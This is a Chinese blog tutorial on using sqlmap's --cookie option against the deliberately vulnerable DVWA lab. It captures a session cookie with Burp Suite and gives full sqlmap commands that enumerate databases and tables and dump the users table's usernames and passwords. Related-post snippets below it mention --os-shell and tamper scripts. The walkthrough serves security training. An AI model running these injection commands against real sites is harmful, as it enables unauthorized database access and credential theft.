SQLMAP进阶使用 --cookie

最新推荐文章于 2025-03-20 18:25:06 发布
最新推荐文章于 2025-03-20 18:25:06 发布
阅读量7.4k 收藏 27
点赞数 3
分类专栏: SQL注入 文章标签: web安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123015001
版权

实验原理

Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。

1.访问DVWA网站

1)访问dvwa,并登录。admin password

2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA网站的安全级别设为“Low”,并点击Submt

3)左侧菜单点击“SQL Injection”模块,进入SQL注入训练模块

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://i-blog.csdnimg.cn/blog_migrate/6537c43e77c2c49277bee1eab6d0b1af.png

2)设置Firefox代理

​ 

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://i-blog.csdnimg.cn/blog_migrate/10bfdc0ae0c2cf91c783ede54dd6aa1c.png

 4)利用Burpsuite工具拦截HTTP请求包

进入DVWA网站SQL注入训练模块,输入1,点击Submit,此时Burpsuite会拦截到HTTP请求包

 将其中的cookie值拷贝下来,作为下一步为SQLMAP的 --cookie参数赋值

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://i-blog.csdnimg.cn/blog_migrate/4a3c18e77fb82bf1d103b451fa3c7c5b.png

 4.寻找注入点

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" 

 检测结果

 5.获取数据库的库名

1)获取所有数据库的库名

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --dbs

 

 2)获取当前数据库的库名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --current-db

 

6.获取dvwa数据库中所有的表名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa --tables 

 

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users --columns 

 

8.获取users表中user和password字段的全部值

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users -C user,password --dump 

 

sqlmap指定cookie_sqlmap使用
weixin_42128393的博客
01-30 1538
kali中sqlmap使用sqlmap简介:SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。目前支持Mysql、Oracle、MS-SQL、PostgreSQL与Access等数据库。SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包含数据库指纹、枚举、数据库提取,访问...
sqlmap指定cookie_SQLmap
weixin_26812607的博客
01-30 651
**参数解释**星号在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分--data使用post方式提交的时候,就需要用到data参数了-p当我们已经事先知道哪一个参数存在注入就可以直接使用-p来指定,从而减少运行时间--level不同的level等级,SQLMAP所采用的策略也不近相同,当–level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数;当–...
SQLmap 注入 -04-cookies
shenghuiping2001的专栏
01-22 346
SQLmap 利用 cookies 来注入web, 另外sqlmap 后面也可以加 --sql-shell, 来进入mysql shell 进行交互。
dvwa的三个模式下sqlmap命令一把梭哈
最新发布
2301_81684021的博客
03-20 314
SQL注入SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。
SQL labs-SQL注入(五,使用sqlmap进行cookie注入
2302_80280669的博客
07-24 1018
Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":当用户访问 web 页面时,他的名字可以记录在 cookie 中。在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。
sqlmap指定cookie_sqlmap处理cookie数据
weixin_34061793的博客
12-24 1999
Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookieweb应用中至关重要,用户的唯一标识session id也是存在cookie中的。那么,在sqlmap使用的时候,也会经常需要考虑到cookiesqlmap也提供了和cookie相关的命令,本文将会介绍。1. cookie保存了用户登录状态很多网站的功能都是需要登陆后才能访问,而http本身是无状态的,因此服务器...
SQLmap————4、Cookie注入
Fly_鹏程万里
05-04 1036
说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –level 2 即可!1、判断是否可以注入Sqlmap –u http://www.xxx.com/cookie/test.asp  -...
SQL-SQLMAP进阶使用
qq_64332865的博客
02-19 591
1.访问DvWA网站 (1)在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的DVWA网站。访问的URL为: http ://[靶机 IP]/dvwal (注意大小写) 2.利用Burpsuite 工具抓包 (1)启动Burpsuite 在攻击机 Pentest-Atk 的桌面文件夹Burp中,鼠标左键双击BURP.cmd程序, 启动Burpsuite 。 (2)设置Burpsuite的代理服务端口 在 Burpsuite 软件界面上选择选项卡"Pr..
最新SQLMap进阶技术
2301_81250923的博客
11-30 760
当数据库为MySQL、PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数时,可以使用参数“--os-cmd”执行系统命令。使用参数“--os-shell”可以模拟一个真实的Shell,与服务器进行交互。虽然SQLMap自带的tamper绕过脚本可以做很多事情,但实际环境往往比较复杂,tamper绕过脚本无法应对所有情况,因此建议读者在学习如何使用自带的tamper绕过脚本的同时,掌握tamper绕过脚本的编写规则,这样在应对各种实战环境时能更自如。
sqlmap进阶
洋洋的小黑屋
05-10 484
–level [1,2,3,4,5]:探测等级 level 2:或测试cookie,进行自动破解 level3:测试HTTP User-Agent,Referer等头部信息 –is-dba:验证当前用户是否为管理员权限 若为管理员,则结果为Ture;反之则为False –referer:HTTP Referer头 当level为3或大于3时,会尝试referer注入,可以使用–referer伪造HTTP中的Referer,如: –referer http://www.baidu.com 参数:–os-cmd
sqlmap --cookie
07-27
- *3* [SQLMAP进阶使用 --cookie](https://blog.csdn.net/Z_l123/article/details/123015001)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_...
SQLMAP进阶:参数讲解
知足且坚定,温柔且上进
03-13 2911
1. --level 5: 探测等级 参数–level 5 指需要执行的测试等级,一共有5个等级(1~5),可不加level,默认是1.sqlmap使用的Payload可以在xml/payload.xml中 看到,也可以根据相应的格式添加自己的Payload,其中5级包含的Payload最多,会自动破解出cookie、XFF等头注入。当然,level5的运行速度也比较慢 。 这个参数会影响测试的...
利用SQLMap进行cookie注入
kuxing100的专栏
05-05 2089
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用到cookie注入,一遇到cookie注入就去使用注入中转工具,比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入,就研究了一下,发现其实sqlmap进行cookie注入很简单的。 测试URL:   参数获取使用的是
sqlmap指定cookie_SQLMap使用
weixin_39628041的博客
01-30 2191
SQLMapsqlmap是一款SQL注入漏洞测试工具,支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数​注意:必须指定至少一个目标-u#指定URL,必须使用双引号包含url--...
关于cookie注入使用sqlmap
weixin_43326436的博客
06-10 341
1. python2 sqlmap.py -u http://challenge-d18082c9146962c3.sandbox.ctfhub.com:10080 --cookie id=1 --dbs --level 2 2. python2 sqlmap.py -u http://challenge-d18082c9146962c3.sandbox.ctfhub.com:10080 --cookie id=1 --D sqli --tables --level 2 3. python2 sqlmap.
sqlmap指定cookie_sqlmap语法
weixin_36295500的博客
12-24 227
原标题:sqlmap语法1)判断当前用户是否是dbapython sqlmap.py -u "url" --is-dba -v 12)--users:列出数据库管理系统用户python sqlmap.py -u "url" --users -v 03)--passwords:数据库用户密码(hash)python sqlmap.py -u "url" --passwords -v 0python ...
Sqlmap2021 -- Cookie注入
Web安全工具库
07-07 4236
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
sqlmap对dvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 914
sqlmap对dvwa中输入点进行带cookie注入测试
sqlmap使用post方法对cookie进行注入
u012684933的专栏
03-27 6290
sqlmap默认使用get方法,并且只有在注入level>=2的时候才会对cookie进行注入,要想使用post方法,但是如果post的参数为0,可以指定 --data 为空,下面以cookie名为CNZZDATA3834609为例进行注入:  sqlmap -u http://www.beihai.ccoo.cn/forum/GetUserInfo.Asp?id=0  --cookie="CN
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值